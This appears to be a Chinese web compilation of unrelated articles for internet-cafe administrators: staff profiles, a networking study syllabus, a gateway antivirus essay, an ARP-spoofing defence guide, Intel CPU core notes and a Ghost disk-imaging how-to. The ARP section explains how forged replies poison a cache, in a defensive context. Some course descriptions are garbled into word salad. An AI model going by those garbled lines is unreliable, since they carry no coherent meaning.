三位资深网吧网管寄语 拥有技术我自豪

引言：本文严格的说起来不可以独立成文，考虑到文章里主角都是工作网吧行业中的资深网管，他们的生活经历相比对很多网吧网管朋友有所帮助，所以才将文章摘引过来，但愿你我都能从中阅读到有用的信息。

　　向小波：年龄33，湖北宜昌人，从事网吧工作6年，平时生活简单，网吧到家两点一线，现在多了一个项目就是去玩杀人游戏。在个人收入方面，所得到的或许要比一般网吧的网管高很多。

　　从业经历

　　1999年3月始，开发自己的网络克隆系统。

　　2000年7月至今，分别为凌云网吧、都市新干线网吧、捷通网城等湖北宜昌内的10余家单体网吧进行电脑与服务器的维护工作。

　　行业寄语

　　电脑技术需要不断地去钻研，学习与实践是提升技术水平的主要途径，不断地阅读各种资料，拓宽自己的知识面，电脑技术学无止境。

　　工作绝技：与一般网吧中网管不同的是，我是个可以做大型系统维护的纯技术型网管，由我管理的网吧内的机器维护都是自动化的。比如100台机器要克隆，那么我会用先进的网络克隆技术，而不是单机器逐个安装。也就是说我刻100台机器的时候只需要设置好了，在服务器点一下netghost然后我就可以走了。吃个夜宵回来，系统就全部安装好了。机器会自己刻完以后完成所有必须修改的项目。令我骄傲的是，我所用的网络克隆系统是我们自己开发编写的网吧系统管理软件。这种软件稳定和兼容性好，针对不同的硬件配置有不同的版本，可以最大限度发挥计算机的效能。

　　李航：毕业于江西师范大学计算机及其应用专业，后又参加江西新华电脑学院的清华万博网络工程师培训，现持有清华万博网络工程师证书。在网吧从事工作3年，熟练掌握网吧内的一切技术：如路由器与交换机配置、软路由设置、代理服务器配置、网线制作、局域网组建等，能及时排除网吧内机子的软硬件故障、客人上网遇到的一切问题等各种疑难杂症及突发问题。

　　从业经历

　　2003年3月～2004年，海力电脑（联想专卖）任销售兼技术。

　　2004年6月～2005年，山海城电脑城任销售兼技术。<BR>&nbsp;&nbsp;2005年2月～12月，三利技佳电脑培训中心任教师，网管。<BR>&nbsp;&nbsp;2006年至今，锐龙谷网吧任技术主管。

　　行业寄语

　　也许在网吧里顾客叫我的时候都会喊成是“网管”，但我是把自己定位在技术员上的，我认为技术员跟网管的工作性质有很大差别，是真正静下心来搞技术的。希望诸位技术员能够通过自己丰富的专业知识和实践经验，让更多的人把咱们跟网管区别开来！

　　工作绝技：除了一般技术员都会的电影与游戏服务器的架设、计费软件的安装与设置、母盘制作，游戏更新等，我还为所在网吧量身定做了一个页面，以及配套的远程视频系统。为来玩的顾客提供更为个性化的服务，通过此项服务大大地提高了我们网吧的竞争力，客流比周围同等条件的网吧都要高上许多。

　　本文摘自CBI，内容很简单，可以说是三位网吧网管的简单而真实的心里话，拿过来跟众多的网吧网管分享。编注。

成为网络工程师最快途径—从网管员学起

　　知道你有没有计算机基础，没有的话去学cisco认证，从头系统的学，只要你认真学的话，达到你的目标轻而易举，如果你有计算机基础，就可以自己买一些计算机网络方面的书，这样的书，书店有很多的。

　　首先涉足软件操作平台的学习（基础知识），然后，在此基础上你已经有能力通过循序渐进学习思科认证体系推荐课程来掌握对不同厂商、不同类型的网络设备、服务器等进行统一配置管理、失效管理、性能管理、计帐管理和安全管理的能力、把数据库应用转移到基于Internet的网络环境中，在网络上实现对工作流处理的能力了,这时，在知识结构上讲，你已经是具有相当竞争优势的网络技术人才了,接下来你可以考取一个网络方面的认证证书，认证证书是各知名IT厂商针对其最先进的技术，为业界建立的一套对IT人才进行衡量的标准，很多企业已经借此作为招聘人才的标准了（惨——）！不仅仅是工作上的好处，即便是出国学习，技术移民，认证证书可以帮助你相关专业免修学分，移民加分。所以，你所拥有的充满技术含金量的认证证书会真正成为你叩响成功之门的敲门砖，推荐思科的CCNA，CCNP或微软的MCSE。

如果没有基础，建议从网络管理员学起(务必！)

一、计算机基础、商务办公、网络应用

1、计算机基本组成结构与工作原理

2、键盘练习与中英文打字（五笔）

3、Win2000/xp操作系统应用

4、Word2000文档编辑处理

5、Excel数据表的应用

6、Powerpoint幻灯片制作

7、Access数据库技术

8、Frontpage文件与网页编辑

9、InternetExplorer操作与使用

10、Outlook邮件发与管理

11、常用软件安装与使用

12、计算机病毒处理与维护

13、Moden设置安装

二、计算机组装、调试与维修及局域网设置构建

1、多媒体电脑硬件结构与组装调试

2、多媒体电脑各部件详解与故障分析维修

3、系统与常用软件安装与优化

4、Internet上网的设置

5、企业局域网原理与配置维护

三、计算机网络配置、构建、维护

1、计算机网络模型与TCP/IP协议

2、WIN2000/server/NT配置与组网

3、Web/DNS/FTP/E-mail服务器的应用与调试配置

4、CiscoCCNA网络工程师认证全部课程（路由器、交换机全实验环境）

5、布线规范与实操

6、综合网络工程实例剖析与实验

四、计算机专业英语

使学生理解、掌握和记忆一定量的计算机专业词汇和基本概念以及计算机专业英语的常用结构、句式，能较好地完成专业资料的英汉互译，为今后熟练阅读英文的计算机技术文献、资料和书籍打下良好基础。

五、Redhatlinux操作系统

1、Linux操作系统安装、基本设置及系统管理

2、LINUX与windows共享资源

3、WEB服务器的安装、配置

4、邮件服务器的安装、配置（send-maill）

5、FTP服务器的安装配置（Wu-Ttpd）

6、DNS服务器的安装、配置（NAMED）

7、网络安全及管理

六、MacromediaWeb多媒体网站设计

1、DreamweaverMX网页，站点建立与页面跳转，构建与管理站点，超级链接，外部链接，邮件链接，下载链接，使用层与页面布局，本应用，时间轴，关键帧，动画，运动路径，Css样式表，行为，鼠标事件Java，信息框，广告条，提示信息，控制动画播放，使用模板，库面板与历史面板，网页图像格式，滚动图，导航图等图像使用，表域.表项，浏览项，递交,重置按钮.反馈地址与跳转菜单，表格，框架使用制，M，网。

2、FireworksX页界面创建导入文档绘编辑图像，bWe颜色,样屏绘画与颜色，符号与实体，路径动画，变形动画，动态按钮，时间轴的使用，综合实例。

3、Action指令，新建场景与场景属性，板图形中用文本像处理符号面使图按钮与滚动图，创建，优化，导出动画，帧的使用，综合实例3Flas页动画6、网站的建设策略：框架的应用，网站的接入方式，域名注册与服务器的选择，网站的表单元素及使用，CCS层叠样式表的嵌入，整场属性，入按钮添加actin，按钮制动画播放调景插控。

4、HTML语言：HTML概述，基本标签，基本HTML元素，多媒体对象组织与风格，网站中的数据库应用，网站的安全与防范，网站的调试与发布，FTP上传站点建立与维护。

七、Access2000和SQLserver2000数据库开发

1、Access数据库窗口、数据表、对象、查询、窗体、报表、Web页对象，Access表、字段、说明、数据类型、关键字、查找过滤、导入、链接表、关键字索引，Access窗体编辑、数据分析、查询、报表向导、邮政、Access数据库压缩、加密、解密、安全控制。

2、SQLserver2000数据库开发，SQLserver服务器的管理与安全，SQLQueryAnalyzer的使用，Transct-SQL语言基础，SQLserver数据库管理及使用，SQLserver视图，使用Transact-SQL语言进行程序设计、数据完整性设计及实、存储过程与触发器QLserver的数据传输服务，SQLserver与Web的结合。

八、ASP编程动态数据库网站与企业信息管理系统开发

1、ASP开发环境即服务器的配置。

2、HTML标记语言及Vb脚本语言。

3、操作系统与服务器的配置。

4、ASP内置对象的使用（方法、综合、属性）。

5、ADO组件（connection,Recordeset,Command）对象。

6、应用ASP开发动态数据库网站及企业信息管理系统。

九、汇编语言

1、微机结构，CPU寄存器组，存储分段管理方式。

2、指令系统导地方式、指令格式、数据传送、算术运算指令、逻辑运算指令、串操作指令、控制转段指令、条件字节设置、处理器控制指令、位操作指令。

3、汇编调试环境设置及程序编译调试环境配置及程序编译调试。

4、汇编语言伪指令及高级汇编技术。

5、汇编语言程序设计方法。

6、BIOS和DOS功能调用。

十、C语言程序设计

1、C语言特点、上机步骤、调试流程与运行。

2、算法的特点与表示方法。

3、数据类型、运算符与表达式。

4、C语言的基本语句和顺序结构程序设计。

5、条件语句与选择结构程序设计。

6、循环语句与循环结构程序设计。

7、数组。

8、函数。

9、指针。

10、结构与共同体。

11、文件。

十一、操作系统原理

1、操作系统概述。

2、进程管理。

3、死锁。

4、存储管理。

5、I/O设备管理。

6、文件系统。

十二、VB面向对象编程与C/S分布开发

1、SQL运用数据语言。

2、ADO存取数据库的表示二维对象群。

3、DateEnvironnlent数据库整合。

4、关联性在数据库程序中的实际应用。

5、DiteReport报表生成器。

6、实现不同功能的数据库系统，开发各种功能不同的数据库系统。

十三、软件工程

1、软件工程的产生、发展、软件生命周期及分布开发模型。

2、软件开发各阶段的目标、任务特点、步骤、文档。

3、结构化方法的基本思想、开发过程和步骤、应遵循原则和准则。

4、面向对象方法的基本思想、基本概念、基本模型。

5、软件工程的技术管理。

从网关防护根治病毒及恶意软件

机病毒的发展从DOS时代走到了Windows时代，从引导区病毒走到了网络病毒时代，从病毒作俑者自我炫耀的时代走到了以经济利益为目的的时代。这其中经历了不过短短的20年。为什么短短的20年病毒的发展如此迅速，现在的病毒主要是哪些类型，对我们会造成哪些危害，我们需要做什么准备？作为信息时代的守护神——信息管理者，你准备好了吗？

　　病毒发展历经几代，最初80年代以破坏磁盘的引导扇区而诞生的病毒为起始，到90年代主要针对Windows的文件型病毒；随着互联网时代的到来，越来越多的病毒通过Email的方式进行传播，速度快、涉及面广，难于根治，再有利用系统漏洞进行传播的病毒也是非常难缠的；随后是以间谍软件、网络钓鱼为代表的恶意软件时代，这一时期的恶意软件的经济利益目的已经十分明显。

　　但是未来的病毒是什么样的？我们不能预知未来，但有一点可以肯定：其传播的范围会越来越广，病毒的自我隐藏将更加隐秘，其目的将直接体现为经济利益。这一点我们从现在逐渐受关注的僵尸网络可以看出苗头。

　　根据病毒的发展史，结合我们现在的互联网时代可以看出，我们当前面临的主要是下面几方面的威胁：通过系统漏洞传播的病毒将会越来越多，“零天攻击”离我们已经越来越近；间谍软件、网络钓鱼、玩笑程序、非法拨号等；利用互联网传播的垃圾邮件、非法内容日益增多。

　　从企业目前面临的问题，需要怎样防护？通过什么方式防护？是解决上述问题的首要关键。根据上面的问题我们可以看出，大量的威胁都是来自于互联网，而企业连接互联网必然会有一个出口，如果需要根治这些问题，需要首先从网关防护开始。究竟从网关处怎样防护呢？

　　一、从企业网络防病毒的角度去看

　　企业应用最广的互联网应用主要有：网页浏览、FTP上传下载、收发Email、网络新闻查看等。病毒制造者充分利用了企业的这些日常应用，将病毒隐藏在这些应用中，当HTTP协议浏览网页，通过FTP下载，通过SMTP发送邮件，通过POP3、IMAP4收取邮件的时候。看似正常的一个数据包，其实是一个病毒。

　　二、针对恶意软件的防护

　　恶意软件通常在用户的系统里具有潜伏性、隐蔽性，如果通过防病毒软件进行查杀，很难将其彻底清除，需要一种行之有效的防护措施。而通过网关防护将是一种更加理想的方式，对清除间谍软件、玩笑程序、非法拨号器、网络钓鱼等效果非常理想。

　　三、针对垃圾邮件、内容过滤、Web过滤的防护

　　从上面的问题我们了解到，垃圾邮件严重占用网络带宽，影响员工工作效率。

　　在恶意软件、网络病毒层出不穷的时代，看好自己的“大门”显得尤为重要，只有真正起到了防护作用，才能充分保障您的信息资产。

　　明天，谁让我们跟病毒和恶意软件告别?  

专家支招 防止局域网内ARP欺骗

对于ARP欺骗，提出几点加强安全防范的措施。环境是主机或者网关是基于Linux/BSD的。

　　一、理论前提

　　本着“不冤枉好人，不放过一个坏人的原则”，先说说我的一些想法和理论依据。首先，大家肯定发送ARP欺骗包肯定是一个恶毒的程序自动发送的，正常的TCP/IP网络是不会有这样的错误包发送的。这就假设，如果犯罪嫌疑人没有启动这个破坏程序的时候，网络环境是正常的，或者说网络的ARP环境是正常的，如果我们能在犯罪嫌疑人启动这个犯罪程序的第一时间，一开始就发现了他的犯罪活动，那么就是人赃俱在，不可抵赖了，因为刚才提到，前面网络正常的时候证据是可信和可依靠的。好，接下来我们谈论如何在第一时间发现他的犯罪活动。

　　ARP欺骗的原理如下：

　　假设这样一个网络，一个Hub接了3台机器

　　HostA HostB HostC 其中

　　A的地址为：IP：192.168.10.1 MAC: AA-AA-AA-AA-AA-AA

　　B的地址为：IP：192.168.10.2 MAC: BB-BB-BB-BB-BB-BB

　　C的地址为：IP：192.168.10.3 MAC: CC-CC-CC-CC-CC-CC

　　正常情况下 C:\arp -a

　　Interface: 192.168.10.1 on Interface 0x1000003

　　Internet Address Physical Address Type

　　192.168.10.3 CC-CC-CC-CC-CC-CC dynamic

　　现在假设HostB开始了罪恶的ARP欺骗：

　　B向A发送一个自己伪造的ARP应答，而这个应答中的数据为发送方IP地址是192.168.10.3（C的IP地址），MAC地址是DD-DD-DD-DD-DD-DD（C的MAC地址本来应该是CC-CC-CC-CC-CC-CC，这里被伪造了）。当A接收到B伪造的ARP应答，就会更新本地的ARP缓存（A可不知道被伪造了）。而且A不知道其实是从B发送过来的，A这里只有192.168.10.3（C的IP地址）和无效的DD-DD-DD-DD-DD-DD mac地址，没有和犯罪分子B相关的证据，哈哈，这样犯罪分子岂不乐死了。

　　现在A机器的ARP缓存更新了：

　　C:\>arp -a

　　Interface: 192.168.10.1 on Interface 0x1000003

　　Internet Address Physical Address Type

　　192.168.10.3 DD-DD-DD-DD-DD-DD dynamic

　　这可不是小事。局域网的网络流通可不是根据IP地址进行，而是按照MAC地址进行传输。现在192.168.10.3的MAC地址在A上被改变成一个本不存在的MAC地址。现在A开始Ping 192.168.10.3，网卡递交的MAC地址是DD-DD-DD-DD-DD-DD，结果是什么呢？网络不通，A根本不能Ping通C！！

　　所以，局域网中一台机器，反复向其他机器，特别是向网关，发送这样无效假冒的ARP应答信息包，NND，严重的网络堵塞就开始了！网吧管理员的噩梦开始了。我的目标和任务，就是第一时间，抓住他。不过从刚才的表述好像犯罪分子完美的利用了以太网的缺陷，掩盖了自己的罪行。但其实，以上方法也有留下了蛛丝马迹。尽管，ARP数据包没有留下HostB的地址，但是，承载这个ARP包的ethernet帧却包含了HostB的源地址。而且，正常情况下ethernet数据帧中，帧头中的MAC源地址/目标地址应该和帧数据包中ARP信息配对，这样的ARP包才算是正确的。如果不正确，肯定是假冒的包，可以提醒！但如果匹配的话，也不一定代表正确，说不定伪造者也考虑到了这一步，而伪造出符合格式要求，但内容假冒的ARP数据包。不过这样也没关系，只要网关这里拥有本网段所有MAC地址的网卡数据库，如果和Mac数据库中数据不匹配也是假冒的ARP数据包。也能提醒犯罪分子动手了。

　　二、防范措施

　　1. 建立DHCP服务器(建议建在网关上，因为DHCP不占用多少CPU，而且ARP欺骗攻击一般总是先攻击网关，我们就是要让他先攻击网关，因为网关这里有监控程序的，网关地址建议选择192.168.10.2 ，把192.168.10.1留空，如果犯罪程序愚蠢的话让他去攻击空地址吧)，另外所有客户机的IP地址及其相关主机信息，只能由网关这里取得，网关这里开通DHCP服务，但是要给每个网卡，绑定固定唯一IP地址。一定要保持网内的机器IP/MAC一一对应的关系。这样客户机虽然是DHCP取地址，但每次开机的IP地址都是一样的。

　　2. 建立MAC数据库，把网吧内所有网卡的MAC地址记录下来，每个MAC和IP、地理位置统统装入数据库，以便及时查询备案。

　　3. 网关机器关闭ARP动态刷新的过程，使用静态路邮，这样的话，即使犯罪嫌疑人使用ARP欺骗攻击网关的话，这样对网关也是没有用的，确保主机安全。

　　网关建立静态IP/MAC捆绑的方法是：建立/etc/ethers文件，其中包含正确的IP/MAC对应关系，格式如下：

　　192.168.2.32 08:00:4E:B0:24:47

　　然后再/etc/rc.d/rc.local最后添加：

　　arp -f 生效即可

　　4. 网关监听网络安全。网关上面使用TCPDUMP程序截取每个ARP程序包，弄一个脚本分析软件分析这些ARP协议。ARP欺骗攻击的包一般有以下两个特点，满足之一可视为攻击包报警：第一以太网数据包头的源地址、目标地址和ARP数据包的协议地址不匹配。或者，ARP数据包的发送和目标地址不在自己网络网卡MAC数据库内，或者与自己网络MAC数据库 MAC/IP 不匹配。这些统统第一时间报警，查这些数据包（以太网数据包）的源地址(也有可能伪造)，就大致知道那台机器在发起攻击了。

　　5. 偷偷摸摸的走到那台机器，看看使用人是否故意，还是被任放了什么木马程序陷害的。如果后者，不声不响的找个借口支开他，拔掉网线(不关机,特别要看看Win98里的计划任务)，看看机器的当前使用记录和运行情况，确定是否是在攻击。  

Tualatin

　　这也就是大名鼎鼎的“图拉丁”核心，是Intel在Socket 370架构上的最后一种CPU核心，采用0.13um制造工艺，封装方式采用FC-PGA2和PPGA，核心电压也降低到了1.5V左右，主频范围从1GHz到1.4GHz，外频分别为100MHz（赛扬）和133MHz（Pentium III），二级缓存分别为512KB（Pentium III-S）和256KB（Pentium III和赛扬），这是最强的Socket 370核心，其性能甚至超过了早期低频的Pentium 4系列CPU。

Willamette

　　这是早期的Pentium 4和P4赛扬采用的核心，最初采用Socket 423接口，后来改用Socket 478接口（赛扬只有1.7GHz和1.8GHz两种，都是Socket 478接口），采用0.18um制造工艺，前端总线频率为400MHz， 主频范围从1.3GHz到2.0GHz（Socket 423）和1.6GHz到2.0GHz（Socket 478），二级缓存分别为256KB（Pentium 4）和128KB（赛扬），注意，另外还有些型号的Socket 423接口的Pentium 4居然没有二级缓存！核心电压1.75V左右，封装方式采用Socket 423的PPGA INT2，PPGA INT3，OOI 423-pin，PPGA FC-PGA2和Socket 478的PPGA FC-PGA2以及赛扬采用的PPGA等等。Willamette核心制造工艺落后，发热量大，性能低下，已经被淘汰掉，而被Northwood核心所取代。

Northwood

　　这是目前主流的Pentium 4和赛扬所采用的核心，其与Willamette核心最大的改进是采用了0.13um制造工艺，并都采用Socket 478接口，核心电压1.5V左右，二级缓存分别为128KB（赛扬）和512KB（Pentium 4），前端总线频率分别为400/533/800MHz（赛扬都只有400MHz），主频范围分别为2.0GHz到2.8GHz（赛扬），1.6GHz到2.6GHz（400MHz FSB Pentium 4），2.26GHz到3.06GHz（533MHz FSB Pentium 4）和2.4GHz到3.4GHz（800MHz FSB Pentium 4），并且3.06GHz Pentium 4和所有的800MHz Pentium 4都支持超线程技术（Hyper-Threading Technology），封装方式采用PPGA FC-PGA2和PPGA。按照Intel的规划，Northwood核心会很快被Prescott核心所取代。

Prescott

　　这是目前高端的Pentium 4 EE、主流的Pentium 4和低端的Celeron D所采用的核心。Prescott核心与Northwood核心最大的区别是采用了90nm制造工艺，L1 数据缓存从8KB增加到16KB，流水线结构也从20级增加到了31级，并且开始支持SSE3指令集。Prescott核心CPU初期采用Socket 478接口，现在基本上已经全部转到Socket 775接口，核心电压1.25-1.525V。前端总线频率方面，Celeron D全部都是533MHz FSB，而除了Celeron D之外的其它CPU为533MHz(不支持超线程技术)和800MHz(支持超线程技术)以及最高的1066MHz(支持超线程技术)。二级缓存分别为256KB(Celeron D)、1MB(Socket 478接口的pentium 4以及Socket 775接口的Pentium 4 5XX系列)和2MB(Pentium 4 6XX系列以及Pentium 4 EE)。封装方式采用PPGA(Socket 478)和PLGA(Socket 775)。Prescott核心自从推出以来也在不断的完善和发展，先后加入了硬件防病毒技术Execute Disable Bit(EDB)、节能省电技术Enhanced Intel SpeedStep Technology(EIST)、虚拟化技术Intel Virtualization Technology(Intel VT)以及64位技术EM64T等等，二级缓存也从最初的1MB增加到了2MB。按照Intel的规划，Prescott核心会被Cedar Mill核心取代。

Smithfield

    这是Intel公司的第一款双核心处理器的核心类型，于2005年4月发布，基本上可以认为Smithfield核心是简单的将两个Prescott核心松散地耦合在一起的产物，这是基于独立缓存的松散型耦合方案，其优点是技术简单，缺点是性能不够理想。目前Pentium D 8XX系列以及Pentium EE 8XX系列采用此核心。Smithfield核心采用90nm制造工艺，全部采用Socket 775接口，核心电压1.3V左右，封装方式都采用PLGA，都支持硬件防病毒技术EDB和64位技术EM64T，并且除了Pentium D 8X5和Pentium D 820之外都支持节能省电技术EIST。前端总线频率是533MHz(Pentium D 8X5)和800MHz(Pentium D 8X0和Pentium EE 8XX)，主频范围从2.66GHz到3.2GHz(Pentium D)、3.2GHz(Pentium EE)。Pentium EE和Pentium D的最大区别就是Pentium EE支持超线程技术而Pentium D则不支持。Smithfield核心的两个核心分别具有1MB的二级缓存，在CPU内部两个核心是互相隔绝的，其缓存数据的同步是依靠位于主板北桥芯片上的仲裁单元通过前端总线在两个核心之间传输来实现的，所以其数据延迟问题比较严重，性能并不尽如人意。按照Intel的规划，Smithfield核心将会很快被Presler核心取代。

Cedar Mill

    这是Pentium 4 6X1系列和Celeron D 3X2/3X6系列采用的核心，从2005末开始出现。其与Prescott核心最大的区别是采用了65nm制造工艺，其它方面则变化不大，基本上可以认为是Prescott核心的65nm制程版本。Cedar Mill核心全部采用Socket 775接口，核心电压1.3V左右，封装方式采用PLGA。其中，Pentium 4全部都为800MHz FSB、2MB二级缓存，都支持超线程技术、硬件防病毒技术EDB、节能省电技术EIST以及64位技术EM64T；而Celeron D则是533MHz FSB、512KB二级缓存，支持硬件防病毒技术EDB和64位技术EM64T，不支持超线程技术以及节能省电技术EIST。Cedar Mill核心也是Intel处理器在NetBurst架构上的最后一款单核心处理器的核心类型，按照Intel的规划，Cedar Mill核心将逐渐被Core架构的Conroe核心所取代。

Presler

    这是Pentium D 9XX和Pentium EE 9XX采用的核心，Intel于2005年末推出。基本上可以认为Presler核心是简单的将两个Cedar Mill核心松散地耦合在一起的产物，是基于独立缓存的松散型耦合方案，其优点是技术简单，缺点是性能不够理想。Presler核心采用65nm制造工艺，全部采用Socket 775接口，核心电压1.3V左右，封装方式都采用PLGA，都支持硬件防病毒技术EDB、节能省电技术EIST和64位技术EM64T，并且除了Pentium D 9X5之外都支持虚拟化技术Intel VT。前端总线频率是800MHz(Pentium D)和1066MHz(Pentium EE)。与Smithfield核心类似，Pentium EE和Pentium D的最大区别就是Pentium EE支持超线程技术而Pentium D则不支持，并且两个核心分别具有2MB的二级缓存。在CPU内部两个核心是互相隔绝的，其缓存数据的同步同样是依靠位于主板北桥芯片上的仲裁单元通过前端总线在两个核心之间传输来实现的，所以其数据延迟问题同样比较严重，性能同样并不尽如人意。Presler核心与Smithfield核心相比，除了采用65nm制程、每个核心的二级缓存增加到2MB和增加了对虚拟化技术的支持之外，在技术上几乎没有什么创新，基本上可以认为是Smithfield核心的65nm制程版本。Presler核心也是Intel处理器在NetBurst架构上的最后一款双核心处理器的核心类型，可以说是在NetBurst被抛弃之前的最后绝唱，以后Intel桌面处理器全部转移到Core架构。按照Intel的规划，Presler核心从2006年第三季度开始将逐渐被Core架构的Conroe核心所取代。

Yonah

    目前采用Yonah核心CPU的有双核心的Core Duo和单核心的Core Solo，另外Celeron M也采用了此核心，Yonah是Intel于2006年初推出的。这是一种单/双核心处理器的核心类型，其在应用方面的特点是具有很大的灵活性，既可用于桌面平台，也可用于移动平台；既可用于双核心，也可用于单核心。Yonah核心来源于移动平台上大名鼎鼎的处理器Pentium M的优秀架构，具有流水线级数少、执行效率高、性能强大以及功耗低等等优点。Yonah核心采用65nm制造工艺，核心电压依版本不同在1.1V-1.3V左右，封装方式采用PPGA，接口类型是改良了的新版Socket 478接口(与以前台式机的Socket 478并不兼容)。在前端总线频率方面，目前Core Duo和Core Solo都是667MHz，而Yonah核心Celeron M是533MHz。在二级缓存方面，目前Core Duo和Core Solo都是2MB，而即Yonah核心Celeron M是1MB。Yonah核心都支持硬件防病毒技术EDB以及节能省电技术EIST，并且多数型号支持虚拟化技术Intel VT。但其最大的遗憾是不支持64位技术，仅仅只是32位的处理器。值得注意的是，对于双核心的Core Duo而言，其具有的2MB二级缓存在架构上不同于目前所有X86处理器，其它的所有X86处理器都是每个核心独立具有二级缓存，而Core Duo的Yonah核心则是采用了与IBM的多核心处理器类似的缓存方案----两个核心共享2MB的二级缓存！共享式的二级缓存配合Intel的“Smart cache”共享缓存技术，实现了真正意义上的缓存数据同步，大幅度降低了数据延迟，减少了对前端总线的占用。这才是严格意义上的真正的双核心处理器！Yonah核心是共享缓存的紧密型耦合方案，其优点是性能理想，缺点是技术比较复杂。不过，按照Intel的规划，以后Intel各个平台的处理器都将会全部转移到Core架构，Yonah核心其实也只是一个过渡的核心类型，从2006年第三季度开始，其在桌面平台上将会被Conroe核心取代，而在移动平台上则会被Merom核心所取代。

Conroe

    这是更新的Intel桌面平台双核心处理器的核心类型，其名称来源于美国德克萨斯州的小城市“Conroe”。Conroe核心于2006年7月27日正式发布，是全新的Core(酷睿)微架构(Core Micro-Architecture)应用在桌面平台上的第一种CPU核心。目前采用此核心的有Core 2 Duo E6x00系列和Core 2 Extreme X6x00系列。与上代采用NetBurst微架构的Pentium D和Pentium EE相比，Conroe核心具有流水线级数少、执行效率高、性能强大以及功耗低等等优点。Conroe核心采用65nm制造工艺，核心电压为1.3V左右，封装方式采用PLGA，接口类型仍然是传统的Socket 775。在前端总线频率方面，目前Core 2 Duo和Core 2 Extreme都是1066MHz，而顶级的Core 2 Extreme将会升级到1333MHz；在一级缓存方面，每个核心都具有32KB的数据缓存和32KB的指令缓存，并且两个核心的一级数据缓存之间可以直接交换数据；在二级缓存方面，Conroe核心都是两个内核共享4MB。Conroe核心都支持硬件防病毒技术EDB、节能省电技术EIST和64位技术EM64T以及虚拟化技术Intel VT。与Yonah核心的缓存机制类似，Conroe核心的二级缓存仍然是两个核心共享，并通过改良了的Intel Advanced Smart Cache(英特尔高级智能高速缓存)共享缓存技术来实现缓存数据的同步。Conroe核心是目前最先进的桌面平台处理器核心，在高性能和低功耗上找到了一个很好的平衡点，全面压倒了目前的所有桌面平台双核心处理器，加之又拥有非常不错的超频能力，确实是目前最强劲的台式机CPU核心。

Allendale

    这是与Conroe同时发布的Intel桌面平台双核心处理器的核心类型，其名称来源于美国加利福尼亚州南部的小城市“Allendale”。Allendale核心于2006年7月27日正式发布，仍然基于全新的Core(酷睿)微架构，目前采用此核心的有1066MHz FSB的Core 2 Duo E6x00系列，即将发布的还有800MHz FSB的Core 2 Duo E4x00系列。Allendale核心的二级缓存机制与Conroe核心相同，但共享式二级缓存被削减至2MB。Allendale核心仍然采用65nm制造工艺，核心电压为1.3V左右，封装方式采用PLGA，接口类型仍然是传统的Socket 775，并且仍然支持硬件防病毒技术EDB、节能省电技术EIST和64位技术EM64T以及虚拟化技术Intel VT。除了共享式二级缓存被削减到2MB以及二级缓存是8路64Byte而非Conroe核心的16路64Byte之外，Allendale核心与Conroe核心几乎完全一样，可以说就是Conroe核心的简化版。当然由于二级缓存上的差异，在频率相同的情况下Allendale核心性能会稍逊于Conroe核心。

Merom

    这是与Conroe同时发布的Intel移动平台双核心处理器的核心类型，其名称来源于以色列境内约旦河旁边的一个湖泊“Merom”。Merom核心于2006年7月27日正式发布，仍然基于全新的Core(酷睿)微架构，这也是Intel全平台(台式机、笔记本和服务器)处理器首次采用相同的微架构设计，目前采用此核心的有667MHz FSB的Core 2 Duo T7x00系列和Core 2 Duo T5x00系列。与桌面版的Conroe核心类似，Merom核心仍然采用65nm制造工艺，核心电压为1.3V左右，封装方式采用PPGA，接口类型仍然是与Yonah核心Core Duo和Core Solo兼容的改良了的新版Socket 478接口(与以前台式机的Socket 478并不兼容)或Socket 479接口，仍然采用Socket 479插槽。Merom核心同样支持硬件防病毒技术EDB、节能省电技术EIST和64位技术EM64T以及虚拟化技术Intel VT。Merom核心的二级缓存机制也与Conroe核心相同，Core 2 Duo T7x00系列的共享式二级缓存为4MB，而Core 2 Duo T5x00系列的共享式二级缓存为2MB。Merom核心的主要技术特性与Conroe核心几乎完全相同，只是在Conroe核心的基础上利用多种手段加强了功耗控制，使其TDP功耗几乎只有Conroe核心的一半左右，以满足移动平台的节电需求。

一键还原GHOST的用法！

朋友,你首先要准备一个DOS启动盘.并设为光盘启动. 然后进入GHOST执行文件夹,执行GHOST8.0,或是8.2,8.3版本.(命令如下:cd ghost(要是在D盘,你就要cd d:\ghost) 回车 ghost8.0 (或是 ghost8.2视你版本而定) 回车 进入GHOST后,就有图形界面了. GHOST的操作应用 GHOST！英文原意为幽灵，是由SYMANTEC公司出品的一种硬盘镜像软件。 1、硬盘间的复制： 首先将两块硬盘安装在同一个机器上，设好主从状态，在DOS状态下（有些时候，GHOST也可以WIN98下运行，但为了防止意味的情况发生，建议你运行在DOS环境下）运行GHOST，然后选择LOCAL、DISK、TO DISK，此时GHOST就会显示有两个磁盘的情况，然后点击第一个磁盘（原盘），按GHOST提示进行确认，然后再点击第二个磁盘（目标盘），再进行确认之后GHOST就开始复制的工作。屏幕上方将有蓝色进度条显示其进行的状态，一般1G左右的数据在10分钟左右就可以完成。操作此功能，注意的是选择原盘和目标盘时千万不要搞错，如果你选择反了，等到复制完之后你就只能得到两个空盘了。 对于不同容量的两个硬盘，这个方法只能使用在从小硬盘复制到大硬盘之上，反之则不行。进行复制后的大硬盘，你还可以通过分区软件来将剩余的空间找出来（因为GHOST为将剩余的空间做为空闲处理）。对于其中有坏道的硬盘来说，这种复制操作后，系统运行会变得不稳定，所以要注意。 2、从硬盘到镜像： 安装两个硬盘在一台机器上，运行GHOST，选择LOCAL DISK TO IMAGE。此时GHOST就会显示两个磁盘的情况，然后选定要备份的硬盘，再选定镜像文件放置在什么位置（往往是第二块硬盘的某一个目录中，目录要事先建立好的！）然后在屏幕下端的提示栏中输入一个名字，比如DISKIMG，再按回车，就可以进行备份的工作了，同样有一个进度条演示进度过程。 3、通过镜像恢复到硬盘： 1、运行GHOST，然后选择LOCAL DISK FROM IMAGE， 2、再选择你所备份的镜像文件存放在位置，然后指定要恢复的硬盘，确认之后，恢复工具就开始了。 4、从分区到分区： 有两个不同的硬盘，而只想有相同的系统和工具软件。可以通过GHOST也完成。首先将两块硬盘安装在同一机器上，运行GHOST。选择LOCAL PARTITION TO PARTITION。然后选择原分区、确认后再选择目标分区（第二块硬盘的第一个分区）。完毕之后，你就有两块都可以启动的硬盘了。因为是分区的复制，所以此处要求两个硬盘进行复制的分区必须大小一致，如果不一致，目标盘其它分区将被删除！ 5、从分区到镜像： 执行GHOST．EXE，屏幕上就可以出现GHOST的主界面。选择LOCAL PARTIION TO IMAGE，然后选定硬盘、分区，确认之后，输入一个备份的名字，例如WIN98BAK，然后按回车。 